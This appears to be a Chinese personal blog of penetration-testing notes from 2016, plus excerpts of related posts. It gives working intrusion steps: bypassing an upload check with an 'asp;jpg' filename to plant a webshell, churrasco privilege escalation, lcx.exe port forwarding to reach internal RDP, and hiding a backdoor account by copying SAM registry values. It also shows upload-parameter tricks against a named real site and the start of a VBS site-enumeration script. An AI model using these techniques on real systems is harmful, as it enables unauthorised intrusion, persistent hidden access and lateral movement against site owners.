2016.5.14渗透经验总结

今天又看了一个渗透案例,拿到网站作者先扫了一下,没有发现可利用的地方,后来在网站上找到了一个用户注册的地方可以上传头像而且存在上传漏洞,但是只允许上传图片格式的,所以作者打开了firebug在其中找到上传格式验证的地方加上了一个asp;jpg再上传时上传成功
c:\RECYCLER 巴西烤肉提权    exp地址 "cmd命令"    渗透内网服务器用端口转发

技术,(之前就学过,这段时间一直没机会用就忘了。)用lcx.exe  本机上运行

lcx.exe -listen 51 33891  在大马中用命令运行 lcx.exe地址 -slave 本机外网ip地

址 51 127.0.0.1 3389      
建立超级隐藏用户 cmd运行命令  net user guest

123456 打开目标机注册表(regedit)找到HKEY_LOCAL开头的那个点开找到SAM中的SAM

右击选择权限添加上在提权时添加的用户赋予完全的权限再在SAM中找到Domains---

Account---users---000001F4中F中的二进制数据全部复制(除去前四列)再点开

000001F5 将其中F中的二进制数据全部替换之后再删除SAM中添加的那个用户 cmd中再执

行命令query user 之后再次登录时用guest账号链接即可密码不变

时间: 2024-12-26 03:43:10

2016.5.14渗透经验总结的相关文章

2016.5.15渗透经验总结

昨天太晚了没来得及写,今天连上昨天的一块写上. 检查所有客户端代码,如HTML及JS代码,寻找任何隐藏了服务器端的线索,以及隐藏的 表单元素等.认证检查注释内容,往往能带给我们惊喜,如部分通用程序会在网站首页放置 一个通向网站管理后台的链接,但网站管理人员不希望这个链接被正常访问者所得知,于 是将内容注释,我们可以通过查看HTML代码得知此具体地址,还有大多数的管理后台中所 调用的JS 中常常会存储着后台所有功能模块的链接地址,但在判断了当前用户权限后将 其隐藏起来,我们也可以通过直接查看JS代

2016.5.5渗透经验总结

今天又看了一个渗透51cto的案例,不过是去年发的,漏洞应该已经没有了.作者也 是碰巧本来是渗透其他网站的,没想到目标站和51cto同服.作者先是去谷歌上搜索 inurl:robots.txt phpcms 找到一个网站以后就开始入侵,作者在目标站上注册了用户 ,本来想上传头像倒是没找到上传的地方,于是就顺手在地址后加上了/index.php? m=member&c=index&a=account_manage_avatar&t=1  (phpcms默认上传图片的地方), 出现上传

2016.5.19渗透经验总结

PHP下防跨站用PHP自带的strip_tags()和htmlspecialchars()可以对用户提交的 html和PHP进行转换,对UPDATE和INSERT中的变量用以上两个函数转换 如果PHP假设在win上那么就可以解析cer,asa,aspx,asax,aspx,cdx格式的文件 而在Linux,Unix上则可以解析pl,PHP3,格式的文件(pl:perl语言) PHP2,PHP,Inc,pwml,asa,cer利用上传webshell 如果PHP使用了文件包含的方法则用 www.x

2016.5.4渗透经验总结

今天看了一个利用上传点通过上传有一句话木马的图片来拿网站webshell的案例.先是找到网站的上传点,http://www.1gouwang.net/taob/admin/upload.asp  在这个网 页上发现上传图片时提示上传失败,这个时候可以在url后加上  ? fuptype=db&fupname=9743727.asp;&frmname=9743727.asp  再次上传图片是就会发现图 片成功上传,之后直接用菜刀链接就可以. 文件名用随便的数字就可以.. IPC$ 是共享命名

fedora 14安装经验

初学linux系统,在win7 系统上安装VMware9.0,并用虚拟机安装fedora.安装了好几次,虽然还是没有彻底通透,但也有一点点心得,特地分享一下: 我安装fedora用于嵌入式ARM开发练习,因此选择软件开发版本. 第一次安装的时候电脑联网使用的是拨号上网,虚拟机选择的是桥接,而安装fedora软件开发版需要联网,折腾了很久,最后用NAT方士成功了, 但后来要使用samba和tftp,经常要切换bridgedhe 和NAT,而且经常切换了就不能上网了,于是感触大出血买了个路由器. 有

2016/01/14开始学习git:标签管理:创建标签

标签也是版本库的一个快照指向某个commit的指针(分支可以移动,标签不能移动) 切换到需要打标签的分支上git tag <name>就可以打一个新标签: $ git tag v1.0 git tag查看所有标签: $ git tagv1.0 打之前提交的版本的commit需要当时的commit ID$ git tag v0.9 93ddf60 查看tag$ git tagv0.9v1.0 标签不是按时间顺序列出,而是按字母排序的.可以用git show <tagname>查看标签

2016.03.14 项目管理知识

第四章:项目管理一般知识 1.核心知识域有哪些.保障域有哪些?伴随域有哪些?过程域有哪些?P140 核心知识域包括整体管理.范围管理.进度管理.成本管理.质量管理和信息安全管理等 保障域包括人力资源管理.合同管理.采购管理.风险管理.信息(文档)与配置管理.知识产权管理.法律法规标准规范和职业道德规范等 伴随域包含变更管理和沟通管理等 过程域包含科研与立项.启动.计划.实施.监控和收尾等,而其中的监控过程则可能发生在项目生命周期的任一个阶段. 2.有效的项目管理要求项目管理团队,至少要使用哪六个

2016.3.14

21.shift v.转移 移动 改变 22.vary v.变化 改变 使多元化 .... 计划有变,单词应该早上被比较好,晚上睡觉比较合适. 今天14号,星期一,明天15号,星期二. 今天白色情人节,娥娥给我打钱,让我自己想买啥就买啥. 今天收到ds18b20 还有检测光亮度的传感器,还有一个12v的小电风扇. 1.18b12可以顺利检测出温度. 2.光亮度也可以顺利检测,只是需要180ms的时间延长来接收光亮数据,导致数码管显示卡顿.发现用定时器中断均无法实现,因为单片机用的不是很熟,无法多

各种提权、渗透经验技巧总结大全

旁站路径问题: 1.读网站配置. 2.用以下VBS: On Error Resume Next If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo” WScript